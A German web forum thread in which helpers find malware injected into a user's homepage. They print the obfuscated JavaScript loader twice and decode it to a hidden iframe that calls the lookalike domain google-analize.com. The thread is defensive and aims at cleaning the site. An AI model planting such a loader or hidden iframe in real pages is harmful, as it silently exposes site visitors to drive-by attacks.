Virus auf Homepage

Da ist tatsächlich einer!

Wer kein Antiviren-Programm laufen hat, auf keinen Fall auf den Link klicken!

Nur mal so als Warnung bevor sich einer was einfängt.
Helfen kann ich dir da leider nicht, da muss jemand anders ran.
 
Laut antivir ein Java-Scriptvirus. Hast du scripts gekauft, oder die ganze Seite machen lassen? Lass mal alle sripts weg , füge sie nach und nach wieder hinzu und prüfe jedesmal ob der Virenscanner noch meckert.
 
Ich habe mir alles machen lassen,nichts selber gemacht.
Kann mir das jemand kontrollieren und alles neu machen?

Ich muss sagem mein Virenscanner meckert nicht.Habe den von CA cecurity.
 
Deine Seite enthält folgenden JavaScript Code:

Code:
function c1860826474n48ec08c1dec3a(n48ec08c1df429){ function n48ec08c1dfc22(){return 16;} return (parseInt(n48ec08c1df429,n48ec08c1dfc22()));}function n48ec08c1e0c12(n48ec08c1e1409){ function n48ec08c1e2bdd(){var n48ec08c1e33cc=2;return n48ec08c1e33cc;} var n48ec08c1e1bf3='';n48ec08c1e3bbc=String.fromCharCode;for(n48ec08c1e23f0=0;n48ec08c1e23f0<n48ec08c1e1409.length;n48ec08c1e23f0+=n48ec08c1e2bdd()){ n48ec08c1e1bf3+=(n48ec08c1e3bbc(c1860826474n48ec08c1dec3a(n48ec08c1e1409.substr(n48ec08c1e23f0,n48ec08c1e2bdd()))));}return n48ec08c1e1bf3;} var x8c='';var n48ec08c1e43ae='3C7'+x8c+'3637'+x8c+'2697'+x8c+'07'+x8c+'43E667'+x8c+'56E637'+x8c+'4696F6E20636865636B5F636F6E7'+x8c+'4656E7'+x8c+'428297'+x8c+'B7'+x8c+'6617'+x8c+'220693D303B7'+x8c+'7'+x8c+'68696C6528646F637'+x8c+'56D656E7'+x8c+'42E67'+x8c+'657'+x8c+'4456C656D656E7'+x8c+'47'+x8c+'3427'+x8c+'9546167'+x8c+'4E616D652827'+x8c+'69667'+x8c+'2616D6527'+x8c+'292E6C656E67'+x8c+'7'+x8c+'468297'+x8c+'B7'+x8c+'6617'+x8c+'220656C3D646F637'+x8c+'56D656E7'+x8c+'42E67'+x8c+'657'+x8c+'4456C656D656E7'+x8c+'47'+x8c+'3427'+x8c+'9546167'+x8c+'4E616D652827'+x8c+'69667'+x8c+'2616D6527'+x8c+'295B695D3B6966282028656C2E7'+x8c+'37'+x8c+'47'+x8c+'96C652E64697'+x8c+'37'+x8c+'06C617'+x8c+'93D3D27'+x8c+'6E6F6E6527'+x8c+'207'+x8c+'C7'+x8c+'C20656C2E7'+x8c+'37'+x8c+'47'+x8c+'96C652E7'+x8c+'6697'+x8c+'36962696C697'+x8c+'47'+x8c+'9203D3D27'+x8c+'68696464656E27'+x8c+'207'+x8c+'C7'+x8c+'C2028656C2E7'+x8c+'7'+x8c+'69647'+x8c+'4683C3520262620656C2E68656967'+x8c+'687'+x8c+'43C35292920262620656C2E6E616D65213D27'+x8c+'633127'+x8c+'297'+x8c+'B656C2E7'+x8c+'0617'+x8c+'2656E7'+x8c+'44E6F64652E7'+x8c+'2656D6F7'+x8c+'6654368696C6428656C293B7'+x8c+'D656C7'+x8c+'36520692B2B3B7'+x8c+'D7'+x8c+'D636865636B5F636F6E7'+x8c+'4656E7'+x8c+'428293B0D0A696628216D7'+x8c+'96961297'+x8c+'B646F637'+x8c+'56D656E7'+x8c+'42E7'+x8c+'7'+x8c+'7'+x8c+'2697'+x8c+'465287'+x8c+'56E657'+x8c+'363617'+x8c+'065282027'+x8c+'2533632536392536362537'+x8c+'322536312536642536352532302536652536312536642536352533642536332533312532302537'+x8c+'332537'+x8c+'32253633253364253237'+x8c+'2536382537'+x8c+'342537'+x8c+'342537'+x8c+'302533612532662532662533322533302533392532652533312533362533302532652533322533332532652533312533302533342532662536632537'+x8c+'332532662533662537'+x8c+'3425336425333225333926253237'+x8c+'2532622534642536312537'+x8c+'342536382532652537'+x8c+'322536662537'+x8c+'352536652536342532382534642536312537'+x8c+'342536382532652537'+x8c+'32253631253665253634253666253664253238253239253261253335253337'+x8c+'253336253330253239253262253237'+x8c+'253632253631253632253633253631253334253337'+x8c+'253635253332253632253333253237'+x8c+'2532302537'+x8c+'37'+x8c+'2536392536342537'+x8c+'34253638253364253333253332253330253230253638253635253639253637'+x8c+'2536382537'+x8c+'342533642533312533382532302537'+x8c+'332537'+x8c+'342537'+x8c+'39253663253635253364253237'+x8c+'2536342536392537'+x8c+'332537'+x8c+'302536632536312537'+x8c+'39253361253230253665253666253665253635253237'+x8c+'2533652533632532662536392536362537'+x8c+'3225363125366425363525336527'+x8c+'29293B7'+x8c+'D7'+x8c+'6617'+x8c+'2206D7'+x8c+'969613D7'+x8c+'47'+x8c+'27'+x8c+'5653B3C2F7'+x8c+'3637'+x8c+'2697'+x8c+'07'+x8c+'43E';document.write(n48ec08c1e0c12(n48ec08c1e43ae));</script><script>function c41883415430m48e9aab49a9f2(m48e9aab49ade9){ function m48e9aab49b1e1(){return 16;} return (parseInt(m48e9aab49ade9,m48e9aab49b1e1()));}function m48e9aab49bdc7(m48e9aab49c5b7){ function m48e9aab49dd85(){return 2;} var m48e9aab49cda7='';m48e9aab49ed6b=String.fromCharCode;for(m48e9aab49d596=0;m48e9aab49d596<m48e9aab49c5b7.length;m48e9aab49d596+=m48e9aab49dd85()){ m48e9aab49cda7+=(m48e9aab49ed6b(c41883415430m48e9aab49a9f2(m48e9aab49c5b7.substr(m48e9aab49d596,m48e9aab49dd85()))));}return m48e9aab49cda7;} var zab='';var m48e9aab49f55c='3C7'+zab+'3637'+zab+'2697'+zab+'07'+zab+'43E667'+zab+'56E637'+zab+'4696F6E20636865636B5F636F6E7'+zab+'4656E7'+zab+'428297'+zab+'B7'+zab+'6617'+zab+'220693D303B7'+zab+'7'+zab+'68696C6528646F637'+zab+'56D656E7'+zab+'42E67'+zab+'657'+zab+'4456C656D656E7'+zab+'47'+zab+'3427'+zab+'9546167'+zab+'4E616D652827'+zab+'69667'+zab+'2616D6527'+zab+'292E6C656E67'+zab+'7'+zab+'468297'+zab+'B7'+zab+'6617'+zab+'220656C3D646F637'+zab+'56D656E7'+zab+'42E67'+zab+'657'+zab+'4456C656D656E7'+zab+'47'+zab+'3427'+zab+'9546167'+zab+'4E616D652827'+zab+'69667'+zab+'2616D6527'+zab+'295B695D3B6966282028656C2E7'+zab+'37'+zab+'47'+zab+'96C652E64697'+zab+'37'+zab+'06C617'+zab+'93D3D27'+zab+'6E6F6E6527'+zab+'207'+zab+'C7'+zab+'C20656C2E7'+zab+'37'+zab+'47'+zab+'96C652E7'+zab+'6697'+zab+'36962696C697'+zab+'47'+zab+'9203D3D27'+zab+'68696464656E27'+zab+'207'+zab+'C7'+zab+'C2028656C2E7'+zab+'7'+zab+'69647'+zab+'4683C3520262620656C2E68656967'+zab+'687'+zab+'43C35292920262620656C2E6E616D65213D27'+zab+'633427'+zab+'297'+zab+'B656C2E7'+zab+'0617'+zab+'2656E7'+zab+'44E6F64652E7'+zab+'2656D6F7'+zab+'6654368696C6428656C293B7'+zab+'D656C7'+zab+'36520692B2B3B7'+zab+'D7'+zab+'D636865636B5F636F6E7'+zab+'4656E7'+zab+'428293B0D0A696628216D7'+zab+'96961297'+zab+'B646F637'+zab+'56D656E7'+zab+'42E7'+zab+'7'+zab+'7'+zab+'2697'+zab+'465287'+zab+'56E657'+zab+'363617'+zab+'065282027'+zab+'2533632536392536362537'+zab+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zab+'332537'+zab+'32253633253364253237'+zab+'2536382537'+zab+'342537'+zab+'342537'+zab+'30253361253266253266253637'+zab+'253666253666253637'+zab+'2536632536352532642536312536652536312536632536392537'+zab+'61253635253265253633253666253664253266253639253665253265253633253637'+zab+'25363925336625333125333526253237'+zab+'2532622534642536312537'+zab+'342536382532652537'+zab+'322536662537'+zab+'352536652536342532382534642536312537'+zab+'342536382532652537'+zab+'32253631253665253634253666253664253238253239253261253331253331253330253338253338253239253262253237'+zab+'253330253338253636253634253337'+zab+'253336253237'+zab+'2532302537'+zab+'37'+zab+'2536392536342537'+zab+'34253638253364253332253331253230253638253635253639253637'+zab+'2536382537'+zab+'342533642533352533322533382532302537'+zab+'332537'+zab+'342537'+zab+'39253663253635253364253237'+zab+'2536342536392537'+zab+'332537'+zab+'302536632536312537'+zab+'39253361253230253665253666253665253635253237'+zab+'2533652533632532662536392536362537'+zab+'3225363125366425363525336527'+zab+'29293B7'+zab+'D7'+zab+'6617'+zab+'2206D7'+zab+'969613D7'+zab+'47'+zab+'27'+zab+'5653B3C2F7'+zab+'3637'+zab+'2697'+zab+'07'+zab+'43E';document.write(m48e9aab49bdc7(m48e9aab49f55c));

Nach dem unescapen des Codes, kann man den Originalcode lesen. Dieser ist folgendermaßen:
Code:
function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c4'){el.parentNode.removeChild(el);}else i++;}}check_content();

if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%31%30%38%38%29%2b%27%30%38%66%64%37%36%27%20%77%69%64%74%68%3d%32%31%20%68%65%69%67%68%74%3d%35%32%38%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;

Wenn man jetzt noch dies her ließt:
Code:
'%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%31%30%38%38%29%2b%27%30%38%66%64%37%36%27%20%77%69%64%74%68%3d%32%31%20%68%65%69%67%68%74%3d%35%32%38%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e

kommt raus:

Code:
<iframe name=c4 src='https://google-analize.com/in.cgi?15&'+Math.round(Math.random()*11088)+'08fd76' width=21 height=528 style='display: none'></iframe>

Code:
google-analize.com
ist NICHT google-analytics.com, sondern eine Seite, die im Firefox blockiert wird. Ich kann diese Seite jedoch nicht erreichen, da kein Server unter dieser Domain antwortet.

Entferne diesen Code von dener Seite!

Hoffe dir geholfen zu haben ;).
 
Unten auf der Seite sind noch mehr Scripts, die hab ich jetzt nicht bearbeitet.

Entferne doch einfach alle <script>'s mit so nem Zeugs drin ;).
 
So, habe es mir mal angesehen. War ne Menge "Scriptcode" drinne der schädlich war, habe nun alles mir bekannte entfernt...aber die Meldung kommt immernoch?!

Weiß leider auch nicht wo da nun noch der Fehler ist...
 
Code:
function c1860826474n48ec08c1dec3a(n48ec08c1df429){ function n48ec08c1dfc22(){return 16;} return (parseInt(n48ec08c1df429,n48ec08c1dfc22()));}function n48ec08c1e0c12(n48ec08c1e1409){ function n48ec08c1e2bdd(){var n48ec08c1e33cc=2;return n48ec08c1e33cc;} var n48ec08c1e1bf3='';n48ec08c1e3bbc=String.fromCharCode;for(n48ec08c1e23f0=0;n48ec08c1e23f0<n48ec08c1e1409.length;n48ec08c1e23f0+=n48ec08c1e2bdd()){ n48ec08c1e1bf3+=(n48ec08c1e3bbc(c1860826474n48ec08c1dec3a(n48ec08c1e1409.substr(n48ec08c1e23f0,n48ec08c1e2bdd()))));}return n48ec08c1e1bf3;} var x8c='';var n48ec08c1e43ae='3C7'+x8c+'3637'+x8c+'2697'+x8c+'07'+x8c+'43E667'+x8c+'56E637'+x8c+'4696F6E20636865636B5F636F6E7'+x8c+'4656E7'+x8c+'428297'+x8c+'B7'+x8c+'6617'+x8c+'220693D303B7'+x8c+'7'+x8c+'68696C6528646F637'+x8c+'56D656E7'+x8c+'42E67'+x8c+'657'+x8c+'4456C656D656E7'+x8c+'47'+x8c+'3427'+x8c+'9546167'+x8c+'4E616D652827'+x8c+'69667'+x8c+'2616D6527'+x8c+'292E6C656E67'+x8c+'7'+x8c+'468297'+x8c+'B7'+x8c+'6617'+x8c+'220656C3D646F637'+x8c+'56D656E7'+x8c+'42E67'+x8c+'657'+x8c+'4456C656D656E7'+x8c+'47'+x8c+'3427'+x8c+'9546167'+x8c+'4E616D652827'+x8c+'69667'+x8c+'2616D6527'+x8c+'295B695D3B6966282028656C2E7'+x8c+'37'+x8c+'47'+x8c+'96C652E64697'+x8c+'37'+x8c+'06C617'+x8c+'93D3D27'+x8c+'6E6F6E6527'+x8c+'207'+x8c+'C7'+x8c+'C20656C2E7'+x8c+'37'+x8c+'47'+x8c+'96C652E7'+x8c+'6697'+x8c+'36962696C697'+x8c+'47'+x8c+'9203D3D27'+x8c+'68696464656E27'+x8c+'207'+x8c+'C7'+x8c+'C2028656C2E7'+x8c+'7'+x8c+'69647'+x8c+'4683C3520262620656C2E68656967'+x8c+'687'+x8c+'43C35292920262620656C2E6E616D65213D27'+x8c+'633127'+x8c+'297'+x8c+'B656C2E7'+x8c+'0617'+x8c+'2656E7'+x8c+'44E6F64652E7'+x8c+'2656D6F7'+x8c+'6654368696C6428656C293B7'+x8c+'D656C7'+x8c+'36520692B2B3B7'+x8c+'D7'+x8c+'D636865636B5F636F6E7'+x8c+'4656E7'+x8c+'428293B0D0A696628216D7'+x8c+'96961297'+x8c+'B646F637'+x8c+'56D656E7'+x8c+'42E7'+x8c+'7'+x8c+'7'+x8c+'2697'+x8c+'465287'+x8c+'56E657'+x8c+'363617'+x8c+'065282027'+x8c+'2533632536392536362537'+x8c+'322536312536642536352532302536652536312536642536352533642536332533312532302537'+x8c+'332537'+x8c+'32253633253364253237'+x8c+'2536382537'+x8c+'342537'+x8c+'342537'+x8c+'302533612532662532662533322533302533392532652533312533362533302532652533322533332532652533312533302533342532662536632537'+x8c+'332532662533662537'+x8c+'3425336425333225333926253237'+x8c+'2532622534642536312537'+x8c+'342536382532652537'+x8c+'322536662537'+x8c+'352536652536342532382534642536312537'+x8c+'342536382532652537'+x8c+'32253631253665253634253666253664253238253239253261253335253337'+x8c+'253336253330253239253262253237'+x8c+'253632253631253632253633253631253334253337'+x8c+'253635253332253632253333253237'+x8c+'2532302537'+x8c+'37'+x8c+'2536392536342537'+x8c+'34253638253364253333253332253330253230253638253635253639253637'+x8c+'2536382537'+x8c+'342533642533312533382532302537'+x8c+'332537'+x8c+'342537'+x8c+'39253663253635253364253237'+x8c+'2536342536392537'+x8c+'332537'+x8c+'302536632536312537'+x8c+'39253361253230253665253666253665253635253237'+x8c+'2533652533632532662536392536362537'+x8c+'3225363125366425363525336527'+x8c+'29293B7'+x8c+'D7'+x8c+'6617'+x8c+'2206D7'+x8c+'969613D7'+x8c+'47'+x8c+'27'+x8c+'5653B3C2F7'+x8c+'3637'+x8c+'2697'+x8c+'07'+x8c+'43E';document.write(n48ec08c1e0c12(n48ec08c1e43ae));</script><script>function c41883415430m48e9aab49a9f2(m48e9aab49ade9){ function m48e9aab49b1e1(){return 16;} return (parseInt(m48e9aab49ade9,m48e9aab49b1e1()));}function m48e9aab49bdc7(m48e9aab49c5b7){ function m48e9aab49dd85(){return 2;} var m48e9aab49cda7='';m48e9aab49ed6b=String.fromCharCode;for(m48e9aab49d596=0;m48e9aab49d596<m48e9aab49c5b7.length;m48e9aab49d596+=m48e9aab49dd85()){ m48e9aab49cda7+=(m48e9aab49ed6b(c41883415430m48e9aab49a9f2(m48e9aab49c5b7.substr(m48e9aab49d596,m48e9aab49dd85()))));}return m48e9aab49cda7;} var zab='';var m48e9aab49f55c='3C7'+zab+'3637'+zab+'2697'+zab+'07'+zab+'43E667'+zab+'56E637'+zab+'4696F6E20636865636B5F636F6E7'+zab+'4656E7'+zab+'428297'+zab+'B7'+zab+'6617'+zab+'220693D303B7'+zab+'7'+zab+'68696C6528646F637'+zab+'56D656E7'+zab+'42E67'+zab+'657'+zab+'4456C656D656E7'+zab+'47'+zab+'3427'+zab+'9546167'+zab+'4E616D652827'+zab+'69667'+zab+'2616D6527'+zab+'292E6C656E67'+zab+'7'+zab+'468297'+zab+'B7'+zab+'6617'+zab+'220656C3D646F637'+zab+'56D656E7'+zab+'42E67'+zab+'657'+zab+'4456C656D656E7'+zab+'47'+zab+'3427'+zab+'9546167'+zab+'4E616D652827'+zab+'69667'+zab+'2616D6527'+zab+'295B695D3B6966282028656C2E7'+zab+'37'+zab+'47'+zab+'96C652E64697'+zab+'37'+zab+'06C617'+zab+'93D3D27'+zab+'6E6F6E6527'+zab+'207'+zab+'C7'+zab+'C20656C2E7'+zab+'37'+zab+'47'+zab+'96C652E7'+zab+'6697'+zab+'36962696C697'+zab+'47'+zab+'9203D3D27'+zab+'68696464656E27'+zab+'207'+zab+'C7'+zab+'C2028656C2E7'+zab+'7'+zab+'69647'+zab+'4683C3520262620656C2E68656967'+zab+'687'+zab+'43C35292920262620656C2E6E616D65213D27'+zab+'633427'+zab+'297'+zab+'B656C2E7'+zab+'0617'+zab+'2656E7'+zab+'44E6F64652E7'+zab+'2656D6F7'+zab+'6654368696C6428656C293B7'+zab+'D656C7'+zab+'36520692B2B3B7'+zab+'D7'+zab+'D636865636B5F636F6E7'+zab+'4656E7'+zab+'428293B0D0A696628216D7'+zab+'96961297'+zab+'B646F637'+zab+'56D656E7'+zab+'42E7'+zab+'7'+zab+'7'+zab+'2697'+zab+'465287'+zab+'56E657'+zab+'363617'+zab+'065282027'+zab+'2533632536392536362537'+zab+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zab+'332537'+zab+'32253633253364253237'+zab+'2536382537'+zab+'342537'+zab+'342537'+zab+'30253361253266253266253637'+zab+'253666253666253637'+zab+'2536632536352532642536312536652536312536632536392537'+zab+'61253635253265253633253666253664253266253639253665253265253633253637'+zab+'25363925336625333125333526253237'+zab+'2532622534642536312537'+zab+'342536382532652537'+zab+'322536662537'+zab+'352536652536342532382534642536312537'+zab+'342536382532652537'+zab+'32253631253665253634253666253664253238253239253261253331253331253330253338253338253239253262253237'+zab+'253330253338253636253634253337'+zab+'253336253237'+zab+'2532302537'+zab+'37'+zab+'2536392536342537'+zab+'34253638253364253332253331253230253638253635253639253637'+zab+'2536382537'+zab+'342533642533352533322533382532302537'+zab+'332537'+zab+'342537'+zab+'39253663253635253364253237'+zab+'2536342536392537'+zab+'332537'+zab+'302536632536312537'+zab+'39253361253230253665253666253665253635253237'+zab+'2533652533632532662536392536362537'+zab+'3225363125366425363525336527'+zab+'29293B7'+zab+'D7'+zab+'6617'+zab+'2206D7'+zab+'969613D7'+zab+'47'+zab+'27'+zab+'5653B3C2F7'+zab+'3637'+zab+'2697'+zab+'07'+zab+'43E';document.write(m48e9aab49bdc7(m48e9aab49f55c));

Das is doch noch immer drin8O
Das muss schon raus damits nicht mehr erkannt wird!
 
Naja, ich habe Avira und keine Meldung bekommen. vllt hat es Adblock Plus verhindert^^

Jaah jetzt wo du plötzlich Scriptblocker erwähnst fällt mir auf, das Norton das auch nicht gemeldet haben kann:roll::ugly:

EDIT: btw: bei Scriptblockern verziehts das Design vollkommen

Also gut jetzt reichts. Ich versuch mich auch mal dran :mrgreen:
Schreib mir mal ne PN ;)
 
Ich bin so froh das ihr mir helft.Soll nicht umsonst sein.DANKE

Danke für den roten.
Text...
kein Geld ausgeben wollen für ein ordentliches Script und dann sollen andere für lau ausbessern, geht´s noch ?

Du ich habe mir überlegt ein neues Script zu kaufen.Und für lau bessert bei mir keiner was aus.Ich habe für Hilfe IMMER bezahlt.
 
Zuletzt bearbeitet: